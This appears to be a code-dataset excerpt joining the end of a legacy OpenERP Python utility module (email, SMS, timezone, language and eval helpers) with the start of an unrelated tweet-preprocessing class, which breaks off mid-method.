raise IOError, 'File not found : %s' % name
#----------------------------------------------------------
# iterables
#----------------------------------------------------------
def flatten(list):
"""Flatten a list of elements into a uniqu list
Author: Christophe Simonis (christophe@tinyerp.com)
Examples::
>>> flatten(['a'])
['a']
>>> flatten('b')
['b']
>>> flatten( [] )
[]
>>> flatten( [[], [[]]] )
[]
>>> flatten( [[['a','b'], 'c'], 'd', ['e', [], 'f']] )
['a', 'b', 'c', 'd', 'e', 'f']
>>> t = (1,2,(3,), [4, 5, [6, [7], (8, 9), ([10, 11, (12, 13)]), [14, [], (15,)], []]])
>>> flatten(t)
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
"""
def isiterable(x):
return hasattr(x, "__iter__")
r = []
for e in list:
if isiterable(e):
map(r.append, flatten(e))
else:
r.append(e)
return r
def reverse_enumerate(l):
"""Like enumerate but in the other sens
Usage::
>>> a = ['a', 'b', 'c']
>>> it = reverse_enumerate(a)
>>> it.next()
(2, 'c')
>>> it.next()
(1, 'b')
>>> it.next()
(0, 'a')
>>> it.next()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
StopIteration
"""
return izip(xrange(len(l)-1, -1, -1), reversed(l))
#----------------------------------------------------------
# Emails
#----------------------------------------------------------
email_re = re.compile(r"""
([a-zA-Z][\w\.-]*[a-zA-Z0-9] # username part
@ # mandatory @ sign
[a-zA-Z0-9][\w\.-]* # domain must start with a letter ... Ged> why do we include a 0-9 then?
\.
[a-z]{2,3} # TLD
)
""", re.VERBOSE)
res_re = re.compile(r"\[([0-9]+)\]", re.UNICODE)
command_re = re.compile("^Set-([a-z]+) *: *(.+)$", re.I + re.UNICODE)
reference_re = re.compile("<.*-open(?:object|erp)-(\\d+).*@(.*)>", re.UNICODE)
def html2plaintext(html, body_id=None, encoding='utf-8'):
""" From an HTML text, convert the HTML to plain text.
If @param body_id is provided then this is the tag where the
body (not necessarily <body>) starts.
"""
## (c) Fry-IT, www.fry-it.com, 2007
## <peter@fry-it.com>
## download here: http://www.peterbe.com/plog/html2plaintext
html = ustr(html)
from lxml.etree import tostring
try:
from lxml.html.soupparser import fromstring
kwargs = {}
except ImportError:
_logger.debug('tools.misc.html2plaintext: cannot use BeautifulSoup, fallback to lxml.etree.HTMLParser')
from lxml.etree import fromstring, HTMLParser
kwargs = dict(parser=HTMLParser())
tree = fromstring(html, **kwargs)
if body_id is not None:
source = tree.xpath('//*[@id=%s]'%(body_id,))
else:
source = tree.xpath('//body')
if len(source):
tree = source[0]
url_index = []
i = 0
for link in tree.findall('.//a'):
url = link.get('href')
if url:
i += 1
link.tag = 'span'
link.text = '%s [%s]' % (link.text, i)
url_index.append(url)
html = ustr(tostring(tree, encoding=encoding))
html = html.replace('<strong>','*').replace('</strong>','*')
html = html.replace('<b>','*').replace('</b>','*')
html = html.replace('<h3>','*').replace('</h3>','*')
html = html.replace('<h2>','**').replace('</h2>','**')
html = html.replace('<h1>','**').replace('</h1>','**')
html = html.replace('<em>','/').replace('</em>','/')
html = html.replace('<tr>', '\n')
html = html.replace('</p>', '\n')
html = re.sub('<br\s*/?>', '\n', html)
html = re.sub('<.*?>', ' ', html)
html = html.replace(' ' * 2, ' ')
# strip all lines
html = '\n'.join([x.strip() for x in html.splitlines()])
html = html.replace('\n' * 2, '\n')
for i, url in enumerate(url_index):
if i == 0:
html += '\n\n'
html += ustr('[%s] %s\n') % (i+1, url)
return html
def generate_tracking_message_id(res_id):
"""Returns a string that can be used in the Message-ID RFC822 header field
Used to track the replies related to a given object thanks to the "In-Reply-To"
or "References" fields that Mail User Agents will set.
"""
return "<%s-openerp-%s@%s>" % (time.time(), res_id, socket.gethostname())
def email_send(email_from, email_to, subject, body, email_cc=None, email_bcc=None, reply_to=False,
attachments=None, message_id=None, references=None, openobject_id=False, debug=False, subtype='plain', headers=None,
smtp_server=None, smtp_port=None, ssl=False, smtp_user=None, smtp_password=None, cr=None, uid=None):
"""Low-level function for sending an email (deprecated).
:deprecate: since OpenERP 6.1, please use ir.mail_server.send_email() instead.
:param email_from: A string used to fill the `From` header, if falsy,
config['email_from'] is used instead. Also used for
the `Reply-To` header if `reply_to` is not provided
:param email_to: a sequence of addresses to send the mail to.
"""
# If not cr, get cr from current thread database
local_cr = None
if not cr:
db_name = getattr(threading.currentThread(), 'dbname', None)
if db_name:
local_cr = cr = pooler.get_db_only(db_name).cursor()
else:
raise Exception("No database cursor found, please pass one explicitly")
# Send Email
try:
mail_server_pool = pooler.get_pool(cr.dbname).get('ir.mail_server')
res = False
# Pack Message into MIME Object
email_msg = mail_server_pool.build_email(email_from, email_to, subject, body, email_cc, email_bcc, reply_to,
attachments, message_id, references, openobject_id, subtype, headers=headers)
res = mail_server_pool.send_email(cr, uid or 1, email_msg, mail_server_id=None,
smtp_server=smtp_server, smtp_port=smtp_port, smtp_user=smtp_user, smtp_password=smtp_password,
smtp_encryption=('ssl' if ssl else None), smtp_debug=debug)
except Exception:
_logger.exception("tools.email_send failed to deliver email")
return False
finally:
if local_cr: local_cr.close()
return res
#----------------------------------------------------------
# SMS
#----------------------------------------------------------
# text must be latin-1 encoded
def sms_send(user, password, api_id, text, to):
import urllib
url = "http://api.urlsms.com/SendSMS.aspx"
#url = "http://196.7.150.220/http/sendmsg"
params = urllib.urlencode({'UserID': user, 'Password': password, 'SenderID': api_id, 'MsgText': text, 'RecipientMobileNo':to})
urllib.urlopen(url+"?"+params)
# FIXME: Use the logger if there is an error
return True
class UpdateableStr(local):
""" Class that stores an updateable string (used in wizards)
"""
def __init__(self, string=''):
self.string = string
def __str__(self):
return str(self.string)
def __repr__(self):
return str(self.string)
def __nonzero__(self):
return bool(self.string)
class UpdateableDict(local):
"""Stores an updateable dict to use in wizards
"""
def __init__(self, dict=None):
if dict is None:
dict = {}
self.dict = dict
def __str__(self):
return str(self.dict)
def __repr__(self):
return str(self.dict)
def clear(self):
return self.dict.clear()
def keys(self):
return self.dict.keys()
def __setitem__(self, i, y):
self.dict.__setitem__(i, y)
def __getitem__(self, i):
return self.dict.__getitem__(i)
def copy(self):
return self.dict.copy()
def iteritems(self):
return self.dict.iteritems()
def iterkeys(self):
return self.dict.iterkeys()
def itervalues(self):
return self.dict.itervalues()
def pop(self, k, d=None):
return self.dict.pop(k, d)
def popitem(self):
return self.dict.popitem()
def setdefault(self, k, d=None):
return self.dict.setdefault(k, d)
def update(self, E, **F):
return self.dict.update(E, F)
def values(self):
return self.dict.values()
def get(self, k, d=None):
return self.dict.get(k, d)
def has_key(self, k):
return self.dict.has_key(k)
def items(self):
return self.dict.items()
def __cmp__(self, y):
return self.dict.__cmp__(y)
def __contains__(self, k):
return self.dict.__contains__(k)
def __delitem__(self, y):
return self.dict.__delitem__(y)
def __eq__(self, y):
return self.dict.__eq__(y)
def __ge__(self, y):
return self.dict.__ge__(y)
def __gt__(self, y):
return self.dict.__gt__(y)
def __hash__(self):
return self.dict.__hash__()
def __iter__(self):
return self.dict.__iter__()
def __le__(self, y):
return self.dict.__le__(y)
def __len__(self):
return self.dict.__len__()
def __lt__(self, y):
return self.dict.__lt__(y)
def __ne__(self, y):
return self.dict.__ne__(y)
class currency(float):
""" Deprecate
.. warning::
Don't use ! Use res.currency.round()
"""
def __init__(self, value, accuracy=2, rounding=None):
if rounding is None:
rounding=10**-accuracy
self.rounding=rounding
self.accuracy=accuracy
def __new__(cls, value, accuracy=2, rounding=None):
return float.__new__(cls, round(value, accuracy))
#def __str__(self):
# display_value = int(self*(10**(-self.accuracy))/self.rounding)*self.rounding/(10**(-self.accuracy))
# return str(display_value)
def to_xml(s):
return s.replace('&','&').replace('<','<').replace('>','>')
def get_iso_codes(lang):
if lang.find('_') != -1:
if lang.split('_')[0] == lang.split('_')[1].lower():
lang = lang.split('_')[0]
return lang
def get_languages():
# The codes below are those from Launchpad's Rosetta, with the exception
# of some trivial codes where the Launchpad code is xx and we have xx_XX.
languages={
'ab_RU': u'Abkhazian / аҧсуа',
'ar_AR': u'Arabic / الْعَرَبيّة',
'bg_BG': u'Bulgarian / български език',
'bs_BS': u'Bosnian / bosanski jezik',
'ca_ES': u'Catalan / Català',
'cs_CZ': u'Czech / Čeština',
'da_DK': u'Danish / Dansk',
'de_DE': u'German / Deutsch',
'el_GR': u'Greek / Ελληνικά',
'en_CA': u'English (CA)',
'en_GB': u'English (UK)',
'en_US': u'English (US)',
'es_AR': u'Spanish (AR) / Español (AR)',
'es_BO': u'Spanish (BO) / Español (BO)',
'es_CL': u'Spanish (CL) / Español (CL)',
'es_CO': u'Spanish (CO) / Español (CO)',
'es_CR': u'Spanish (CR) / Español (CR)',
'es_DO': u'Spanish (DO) / Español (DO)',
'es_EC': u'Spanish (EC) / Español (EC)',
'es_ES': u'Spanish / Español',
'es_GT': u'Spanish (GT) / Español (GT)',
'es_HN': u'Spanish (HN) / Español (HN)',
'es_MX': u'Spanish (MX) / Español (MX)',
'es_NI': u'Spanish (NI) / Español (NI)',
'es_PA': u'Spanish (PA) / Español (PA)',
'es_PE': u'Spanish (PE) / Español (PE)',
'es_PR': u'Spanish (PR) / Español (PR)',
'es_PY': u'Spanish (PY) / Español (PY)',
'es_SV': u'Spanish (SV) / Español (SV)',
'es_UY': u'Spanish (UY) / Español (UY)',
'es_VE': u'Spanish (VE) / Español (VE)',
'et_EE': u'Estonian / Eesti keel',
'fa_IR': u'Persian / فارس',
'fi_FI': u'Finnish / Suomi',
'fr_BE': u'French (BE) / Français (BE)',
'fr_CH': u'French (CH) / Français (CH)',
'fr_FR': u'French / Français',
'gl_ES': u'Galician / Galego',
'gu_IN': u'Gujarati / ગુજરાતી',
'he_IL': u'Hebrew / עִבְרִי',
'hi_IN': u'Hindi / हिंदी',
'hr_HR': u'Croatian / hrvatski jezik',
'hu_HU': u'Hungarian / Magyar',
'id_ID': u'Indonesian / Bahasa Indonesia',
'it_IT': u'Italian / Italiano',
'iu_CA': u'Inuktitut / ᐃᓄᒃᑎᑐᑦ',
'ja_JP': u'Japanese / 日本語',
'ko_KP': u'Korean (KP) / 한국어 (KP)',
'ko_KR': u'Korean (KR) / 한국어 (KR)',
'lt_LT': u'Lithuanian / Lietuvių kalba',
'lv_LV': u'Latvian / latviešu valoda',
'ml_IN': u'Malayalam / മലയാളം',
'mn_MN': u'Mongolian / монгол',
'nb_NO': u'Norwegian Bokmål / Norsk bokmål',
'nl_NL': u'Dutch / Nederlands',
'nl_BE': u'Flemish (BE) / Vlaams (BE)',
'oc_FR': u'Occitan (FR, post 1500) / Occitan',
'pl_PL': u'Polish / Język polski',
'pt_BR': u'Portugese (BR) / Português (BR)',
'pt_PT': u'Portugese / Português',
'ro_RO': u'Romanian / română',
'ru_RU': u'Russian / русский язык',
'si_LK': u'Sinhalese / සිංහල',
'sl_SI': u'Slovenian / slovenščina',
'sk_SK': u'Slovak / Slovenský jazyk',
'sq_AL': u'Albanian / Shqip',
'sr_RS': u'Serbian (Cyrillic) / српски',
'sr@latin': u'Serbian (Latin) / srpski',
'sv_SE': u'Swedish / svenska',
'te_IN': u'Telugu / తెలుగు',
'tr_TR': u'Turkish / Türkçe',
'vi_VN': u'Vietnamese / Tiếng Việt',
'uk_UA': u'Ukrainian / українська',
'ur_PK': u'Urdu / اردو',
'zh_CN': u'Chinese (CN) / 简体中文',
'zh_HK': u'Chinese (HK)',
'zh_TW': u'Chinese (TW) / 正體字',
'th_TH': u'Thai / ภาษาไทย',
'tlh_TLH': u'Klingon',
}
return languages
def scan_languages():
# Now it will take all languages from get languages function without filter it with base module languages
lang_dict = get_languages()
ret = [(lang, lang_dict.get(lang, lang)) for lang in list(lang_dict)]
ret.sort(key=lambda k:k[1])
return ret
def get_user_companies(cr, user):
def _get_company_children(cr, ids):
if not ids:
return []
cr.execute('SELECT id FROM res_company WHERE parent_id IN %s', (tuple(ids),))
res = [x[0] for x in cr.fetchall()]
res.extend(_get_company_children(cr, res))
return res
cr.execute('SELECT company_id FROM res_users WHERE id=%s', (user,))
user_comp = cr.fetchone()[0]
if not user_comp:
return []
return [user_comp] + _get_company_children(cr, [user_comp])
def mod10r(number):
"""
Input number : account or invoice number
Output return: the same number completed with the recursive mod10
key
"""
codec=[0,9,4,6,8,2,7,1,3,5]
report = 0
result=""
for digit in number:
result += digit
if digit.isdigit():
report = codec[ (int(digit) + report) % 10 ]
return result + str((10 - report) % 10)
def human_size(sz):
"""
Return the size in a human readable format
"""
if not sz:
return False
units = ('bytes', 'Kb', 'Mb', 'Gb')
if isinstance(sz,basestring):
sz=len(sz)
s, i = float(sz), 0
while s >= 1024 and i < len(units)-1:
s = s / 1024
i = i + 1
return "%0.2f %s" % (s, units[i])
def logged(f):
@wraps(f)
def wrapper(*args, **kwargs):
from pprint import pformat
vector = ['Call -> function: %r' % f]
for i, arg in enumerate(args):
vector.append(' arg %02d: %s' % (i, pformat(arg)))
for key, value in kwargs.items():
vector.append(' kwarg %10s: %s' % (key, pformat(value)))
timeb4 = time.time()
res = f(*args, **kwargs)
vector.append(' result: %s' % pformat(res))
vector.append(' time delta: %s' % (time.time() - timeb4))
_logger.debug('\n'.join(vector))
return res
return wrapper
class profile(object):
def __init__(self, fname=None):
self.fname = fname
def __call__(self, f):
@wraps(f)
def wrapper(*args, **kwargs):
class profile_wrapper(object):
def __init__(self):
self.result = None
def __call__(self):
self.result = f(*args, **kwargs)
pw = profile_wrapper()
import cProfile
fname = self.fname or ("%s.cprof" % (f.func_name,))
cProfile.runctx('pw()', globals(), locals(), filename=fname)
return pw.result
return wrapper
__icons_list = ['STOCK_ABOUT', 'STOCK_ADD', 'STOCK_APPLY', 'STOCK_BOLD',
'STOCK_CANCEL', 'STOCK_CDROM', 'STOCK_CLEAR', 'STOCK_CLOSE', 'STOCK_COLOR_PICKER',
'STOCK_CONNECT', 'STOCK_CONVERT', 'STOCK_COPY', 'STOCK_CUT', 'STOCK_DELETE',
'STOCK_DIALOG_AUTHENTICATION', 'STOCK_DIALOG_ERROR', 'STOCK_DIALOG_INFO',
'STOCK_DIALOG_QUESTION', 'STOCK_DIALOG_WARNING', 'STOCK_DIRECTORY', 'STOCK_DISCONNECT',
'STOCK_DND', 'STOCK_DND_MULTIPLE', 'STOCK_EDIT', 'STOCK_EXECUTE', 'STOCK_FILE',
'STOCK_FIND', 'STOCK_FIND_AND_REPLACE', 'STOCK_FLOPPY', 'STOCK_GOTO_BOTTOM',
'STOCK_GOTO_FIRST', 'STOCK_GOTO_LAST', 'STOCK_GOTO_TOP', 'STOCK_GO_BACK',
'STOCK_GO_DOWN', 'STOCK_GO_FORWARD', 'STOCK_GO_UP', 'STOCK_HARDDISK',
'STOCK_HELP', 'STOCK_HOME', 'STOCK_INDENT', 'STOCK_INDEX', 'STOCK_ITALIC',
'STOCK_JUMP_TO', 'STOCK_JUSTIFY_CENTER', 'STOCK_JUSTIFY_FILL',
'STOCK_JUSTIFY_LEFT', 'STOCK_JUSTIFY_RIGHT', 'STOCK_MEDIA_FORWARD',
'STOCK_MEDIA_NEXT', 'STOCK_MEDIA_PAUSE', 'STOCK_MEDIA_PLAY',
'STOCK_MEDIA_PREVIOUS', 'STOCK_MEDIA_RECORD', 'STOCK_MEDIA_REWIND',
'STOCK_MEDIA_STOP', 'STOCK_MISSING_IMAGE', 'STOCK_NETWORK', 'STOCK_NEW',
'STOCK_NO', 'STOCK_OK', 'STOCK_OPEN', 'STOCK_PASTE', 'STOCK_PREFERENCES',
'STOCK_PRINT', 'STOCK_PRINT_PREVIEW', 'STOCK_PROPERTIES', 'STOCK_QUIT',
'STOCK_REDO', 'STOCK_REFRESH', 'STOCK_REMOVE', 'STOCK_REVERT_TO_SAVED',
'STOCK_SAVE', 'STOCK_SAVE_AS', 'STOCK_SELECT_COLOR', 'STOCK_SELECT_FONT',
'STOCK_SORT_ASCENDING', 'STOCK_SORT_DESCENDING', 'STOCK_SPELL_CHECK',
'STOCK_STOP', 'STOCK_STRIKETHROUGH', 'STOCK_UNDELETE', 'STOCK_UNDERLINE',
'STOCK_UNDO', 'STOCK_UNINDENT', 'STOCK_YES', 'STOCK_ZOOM_100',
'STOCK_ZOOM_FIT', 'STOCK_ZOOM_IN', 'STOCK_ZOOM_OUT',
'terp-account', 'terp-crm', 'terp-mrp', 'terp-product', 'terp-purchase',
'terp-sale', 'terp-tools', 'terp-administration', 'terp-hr', 'terp-partner',
'terp-project', 'terp-report', 'terp-stock', 'terp-calendar', 'terp-graph',
'terp-check','terp-go-month','terp-go-year','terp-go-today','terp-document-new','terp-camera_test',
'terp-emblem-important','terp-gtk-media-pause','terp-gtk-stop','terp-gnome-cpu-frequency-applet+',
'terp-dialog-close','terp-gtk-jump-to-rtl','terp-gtk-jump-to-ltr','terp-accessories-archiver',
'terp-stock_align_left_24','terp-stock_effects-object-colorize','terp-go-home','terp-gtk-go-back-rtl',
'terp-gtk-go-back-ltr','terp-personal','terp-personal-','terp-personal+','terp-accessories-archiver-minus',
'terp-accessories-archiver+','terp-stock_symbol-selection','terp-call-start','terp-dolar',
'terp-face-plain','terp-folder-blue','terp-folder-green','terp-folder-orange','terp-folder-yellow',
'terp-gdu-smart-failing','terp-go-week','terp-gtk-select-all','terp-locked','terp-mail-forward',
'terp-mail-message-new','terp-mail-replied','terp-rating-rated','terp-stage','terp-stock_format-scientific',
'terp-dolar_ok!','terp-idea','terp-stock_format-default','terp-mail-','terp-mail_delete'
]
def icons(*a, **kw):
global __icons_list
return [(x, x) for x in __icons_list ]
def extract_zip_file(zip_file, outdirectory):
zf = zipfile.ZipFile(zip_file, 'r')
out = outdirectory
for path in zf.namelist():
tgt = os.path.join(out, path)
tgtdir = os.path.dirname(tgt)
if not os.path.exists(tgtdir):
os.makedirs(tgtdir)
if not tgt.endswith(os.sep):
fp = open(tgt, 'wb')
fp.write(zf.read(path))
fp.close()
zf.close()
def detect_ip_addr():
"""Try a very crude method to figure out a valid external
IP or hostname for the current machine. Don't rely on this
for binding to an interface, but it could be used as basis
for constructing a remote URL to the server.
"""
def _detect_ip_addr():
from array import array
from struct import pack, unpack
try:
import fcntl
except ImportError:
fcntl = None
ip_addr = None
if not fcntl: # not UNIX:
host = socket.gethostname()
ip_addr = socket.gethostbyname(host)
else: # UNIX:
# get all interfaces:
nbytes = 128 * 32
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
names = array('B', '\0' * nbytes)
#print 'names: ', names
outbytes = unpack('iL', fcntl.ioctl( s.fileno(), 0x8912, pack('iL', nbytes, names.buffer_info()[0])))[0]
namestr = names.tostring()
# try 64 bit kernel:
for i in range(0, outbytes, 40):
name = namestr[i:i+16].split('\0', 1)[0]
if name != 'lo':
ip_addr = socket.inet_ntoa(namestr[i+20:i+24])
break
# try 32 bit kernel:
if ip_addr is None:
ifaces = filter(None, [namestr[i:i+32].split('\0', 1)[0] for i in range(0, outbytes, 32)])
for ifname in [iface for iface in ifaces if iface != 'lo']:
ip_addr = socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, pack('256s', ifname[:15]))[20:24])
break
return ip_addr or 'localhost'
try:
ip_addr = _detect_ip_addr()
except Exception:
ip_addr = 'localhost'
return ip_addr
# RATIONALE BEHIND TIMESTAMP CALCULATIONS AND TIMEZONE MANAGEMENT:
# The server side never does any timestamp calculation, always
# sends them in a naive (timezone agnostic) format supposed to be
# expressed within the server timezone, and expects the clients to
# provide timestamps in the server timezone as well.
# It stores all timestamps in the database in naive format as well,
# which also expresses the time in the server timezone.
# For this reason the server makes its timezone name available via the
# common/timezone_get() rpc method, which clients need to read
# to know the appropriate time offset to use when reading/writing
# times.
def get_win32_timezone():
"""Attempt to return the "standard name" of the current timezone on a win32 system.
@return the standard name of the current win32 timezone, or False if it cannot be found.
"""
res = False
if (sys.platform == "win32"):
try:
import _winreg
hklm = _winreg.ConnectRegistry(None,_winreg.HKEY_LOCAL_MACHINE)
current_tz_key = _winreg.OpenKey(hklm, r"SYSTEM\CurrentControlSet\Control\TimeZoneInformation", 0,_winreg.KEY_ALL_ACCESS)
res = str(_winreg.QueryValueEx(current_tz_key,"StandardName")[0]) # [0] is value, [1] is type code
_winreg.CloseKey(current_tz_key)
_winreg.CloseKey(hklm)
except Exception:
pass
return res
def detect_server_timezone():
"""Attempt to detect the timezone to use on the server side.
Defaults to UTC if no working timezone can be found.
@return the timezone identifier as expected by pytz.timezone.
"""
try:
import pytz
except Exception:
_logger.warning("Python pytz module is not available. "
"Timezone will be set to UTC by default.")
return 'UTC'
# Option 1: the configuration option (did not exist before, so no backwards compatibility issue)
# Option 2: to be backwards compatible with 5.0 or earlier, the value from time.tzname[0], but only if it is known to pytz
# Option 3: the environment variable TZ
sources = [ (config['timezone'], 'OpenERP configuration'),
(time.tzname[0], 'time.tzname'),
(os.environ.get('TZ',False),'TZ environment variable'), ]
# Option 4: OS-specific: /etc/timezone on Unix
if (os.path.exists("/etc/timezone")):
tz_value = False
try:
f = open("/etc/timezone")
tz_value = f.read(128).strip()
except Exception:
pass
finally:
f.close()
sources.append((tz_value,"/etc/timezone file"))
# Option 5: timezone info from registry on Win32
if (sys.platform == "win32"):
# Timezone info is stored in windows registry.
# However this is not likely to work very well as the standard name
# of timezones in windows is rarely something that is known to pytz.
# But that's ok, it is always possible to use a config option to set
# it explicitly.
sources.append((get_win32_timezone(),"Windows Registry"))
for (value,source) in sources:
if value:
try:
tz = pytz.timezone(value)
_logger.info("Using timezone %s obtained from %s.", tz.zone, source)
return value
except pytz.UnknownTimeZoneError:
_logger.warning("The timezone specified in %s (%s) is invalid, ignoring it.", source, value)
_logger.warning("No valid timezone could be detected, using default UTC "
"timezone. You can specify it explicitly with option 'timezone' in "
"the server configuration.")
return 'UTC'
def get_server_timezone():
return "UTC"
DEFAULT_SERVER_DATE_FORMAT = "%Y-%m-%d"
DEFAULT_SERVER_TIME_FORMAT = "%H:%M:%S"
DEFAULT_SERVER_DATETIME_FORMAT = "%s %s" % (
DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_TIME_FORMAT)
# Python's strftime supports only the format directives
# that are available on the platform's libc, so in order to
# be cross-platform we map to the directives required by
# the C standard (1989 version), always available on platforms
# with a C standard implementation.
DATETIME_FORMATS_MAP = {
'%C': '', # century
'%D': '%d/%m/%Y', # modified %y->%Y
'%e': '%d',
'%E': '', # special modifier
'%F': '%Y-%m-%d',
'%g': '%Y', # modified %y->%Y
'%G': '%Y',
'%h': '%b',
'%k': '%H',
'%l': '%I',
'%n': '\n',
'%O': '', # special modifier
'%P': '%p',
'%R': '%H:%M',
'%r': '%I:%M:%S %p',
'%s': '', #num of seconds since epoch
'%T': '%H:%M:%S',
'%t': ' ', # tab
'%u': ' %w',
'%V': '%W',
'%y': '%Y', # Even if %y works, it's ambiguous, so we should use %Y
'%+': '%Y-%m-%d %H:%M:%S',
# %Z is a special case that causes 2 problems at least:
# - the timezone names we use (in res_user.context_tz) come
# from pytz, but not all these names are recognized by
# strptime(), so we cannot convert in both directions
# when such a timezone is selected and %Z is in the format
# - %Z is replaced by an empty string in strftime() when
# there is not tzinfo in a datetime value (e.g when the user
# did not pick a context_tz). The resulting string does not
# parse back if the format requires %Z.
# As a consequence, we strip it completely from format strings.
# The user can always have a look at the context_tz in
# preferences to check the timezone.
'%z': '',
'%Z': '',
}
def server_to_local_timestamp(src_tstamp_str, src_format, dst_format, dst_tz_name,
tz_offset=True, ignore_unparsable_time=True):
"""
Convert a source timestamp string into a destination timestamp string, attempting to apply the
correct offset if both the server and local timezone are recognized, or no
offset at all if they aren't or if tz_offset is false (i.e. assuming they are both in the same TZ).
WARNING: This method is here to allow formatting dates correctly for inclusion in strings where
the client would not be able to format/offset it correctly. DO NOT use it for returning
date fields directly, these are supposed to be handled by the client!!
@param src_tstamp_str: the str value containing the timestamp in the server timezone.
@param src_format: the format to use when parsing the server timestamp.
@param dst_format: the format to use when formatting the resulting timestamp for the local/client timezone.
@param dst_tz_name: name of the destination timezone (such as the 'tz' value of the client context)
@param ignore_unparsable_time: if True, return False if src_tstamp_str cannot be parsed
using src_format or formatted using dst_format.
@return local/client formatted timestamp, expressed in the local/client timezone if possible
and if tz_offset is true, or src_tstamp_str if timezone offset could not be determined.
"""
if not src_tstamp_str:
return False
res = src_tstamp_str
if src_format and dst_format:
# find out server timezone
server_tz = get_server_timezone()
try:
# dt_value needs to be a datetime.datetime object (so no time.struct_time or mx.DateTime.DateTime here!)
dt_value = datetime.strptime(src_tstamp_str, src_format)
if tz_offset and dst_tz_name:
try:
import pytz
src_tz = pytz.timezone(server_tz)
dst_tz = pytz.timezone(dst_tz_name)
src_dt = src_tz.localize(dt_value, is_dst=True)
dt_value = src_dt.astimezone(dst_tz)
except Exception:
pass
res = dt_value.strftime(dst_format)
except Exception:
# Normal ways to end up here are if strptime or strftime failed
if not ignore_unparsable_time:
return False
return res
def split_every(n, iterable, piece_maker=tuple):
"""Splits an iterable into length-n pieces. The last piece will be shorter
if ``n`` does not evenly divide the iterable length.
@param ``piece_maker``: function to build the pieces
from the slices (tuple,list,...)
"""
iterator = iter(iterable)
piece = piece_maker(islice(iterator, n))
while piece:
yield piece
piece = piece_maker(islice(iterator, n))
if __name__ == '__main__':
import doctest
doctest.testmod()
class upload_data_thread(threading.Thread):
def __init__(self, email, data, type):
self.args = [('email',email),('type',type),('data',data)]
super(upload_data_thread,self).__init__()
def run(self):
try:
import urllib
args = urllib.urlencode(self.args)
fp = urllib.urlopen('http://www.openerp.com/scripts/survey.php', args)
fp.read()
fp.close()
except Exception:
pass
def upload_data(email, data, type='SURVEY'):
a = upload_data_thread(email, data, type)
a.start()
return True
def get_and_group_by_field(cr, uid, obj, ids, field, context=None):
""" Read the values of ``field´´ for the given ``ids´´ and group ids by value.
:param string field: name of the field we want to read and group by
:return: mapping of field values to the list of ids that have it
:rtype: dict
"""
res = {}
for record in obj.read(cr, uid, ids, [field], context=context):
key = record[field]
res.setdefault(key[0] if isinstance(key, tuple) else key, []).append(record['id'])
return res
def get_and_group_by_company(cr, uid, obj, ids, context=None):
return get_and_group_by_field(cr, uid, obj, ids, field='company_id', context=context)
# port of python 2.6's attrgetter with support for dotted notation
def resolve_attr(obj, attr):
for name in attr.split("."):
obj = getattr(obj, name)
return obj
def attrgetter(*items):
if len(items) == 1:
attr = items[0]
def g(obj):
return resolve_attr(obj, attr)
else:
def g(obj):
return tuple(resolve_attr(obj, attr) for attr in items)
return g
class unquote(str):
"""A subclass of str that implements repr() without enclosing quotation marks
or escaping, keeping the original string untouched. The name come from Lisp's unquote.
One of the uses for this is to preserve or insert bare variable names within dicts during eval()
of a dict's repr(). Use with care.
Some examples (notice that there are never quotes surrounding
the ``active_id`` name:
>>> unquote('active_id')
active_id
>>> d = {'test': unquote('active_id')}
>>> d
{'test': active_id}
>>> print d
{'test': active_id}
"""
def __repr__(self):
return self
class UnquoteEvalContext(defaultdict):
"""Defaultdict-based evaluation context that returns
an ``unquote`` string for any missing name used during
the evaluation.
Mostly useful for evaluating OpenERP domains/contexts that
may refer to names that are unknown at the time of eval,
so that when the context/domain is converted back to a string,
the original names are preserved.
**Warning**: using an ``UnquoteEvalContext`` as context for ``eval()`` or
``safe_eval()`` will shadow the builtins, which may cause other
failures, depending on what is evaluated.
Example (notice that ``section_id`` is preserved in the final
result) :
>>> context_str = "{'default_user_id': uid, 'default_section_id': section_id}"
>>> eval(context_str, UnquoteEvalContext(uid=1))
{'default_user_id': 1, 'default_section_id': section_id}
"""
def __init__(self, *args, **kwargs):
super(UnquoteEvalContext, self).__init__(None, *args, **kwargs)
def __missing__(self, key):
return unquote(key)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
fernandopso/twitter-svm-tfidf.py | app/trainer/processing.py | 2 | 3938 | # !/usr/bin/env python
# -*- coding: utf-8 -*-
import Stemmer
import pt_br_mapper as constants
class Processing(object):
"""
All methods has more sense for Portuguese-BR language
"""
def __init__(self, tweet):
self.tweet = tweet
def execute(self):
"""
Execute all processes to reduce ambiguities
"""
self.lower_case()
self.accented_letters()
self.double_letters()
self.special_characters()
self.similar_words()
self.remove_mentions()
self.remove_links()
self.remove_solitary_letters()
return self.tweet
def lower_case(self):
"""
All words in case letters
"""
self.tweet = self.tweet.lower()
return self.tweet
def accented_letters(self):
"""
Change all accented letters for unaccented
"""
for key in constants.UNICODE_ACCENTED_LETTERS.keys():
value = constants.UNICODE_ACCENTED_LETTERS[key]
self.tweet = self.tweet.replace(key, value)
return self.tweet
def double_letters(self):
"""
Many words are written with double letters
important!
The double letters rr, ss and oo not considered in this case,
this role has more sense for tweet portugues-br
"""
wordList = self.tweet.split()
for key in constants.DOUBLE_LETTERS.keys():
while self.tweet.find(key) != -1:
for word in wordList:
if word.find(key) != -1:
value = constants.DOUBLE_LETTERS[key]
self.tweet = self.tweet.replace(key, value)
return self.tweet
def special_characters(self):
"""
Special characters are letters that make no sense to human readable
"""
for key in constants.SPECIAL_CHARACTERS.keys():
value = constants.SPECIAL_CHARACTERS[key]
self.tweet = self.tweet.replace(key, value)
return self.tweet
def similar_words(self):
"""
Many words are written the way they are pronounced or using analogies
with other small words
"""
word_list = self.tweet.split()
for word in word_list:
for key in constants.SIMILAR_WORDS.keys():
if (len(key.strip()) == len(word.strip())) and (word == key):
value = constants.SIMILAR_WORDS[key]
self.tweet = self.near(self.tweet, key, value)
return self.tweet
def remove_mentions(self):
"""
Remove mentions
"""
if self.tweet.find('@') != -1:
self.tweet = self.remove(self.tweet, '@')
return self.tweet
def remove_links(self):
"""
Remove links
"""
if self.tweet.find('http') != -1:
self.tweet = self.remove(self.tweet, 'http')
return self.tweet
def remove_solitary_letters(self):
"""
Solitary letters can be removed
"""
for key in constants.SOLITARY_LETTERS:
self.tweet = self.near(self.tweet, key, '')
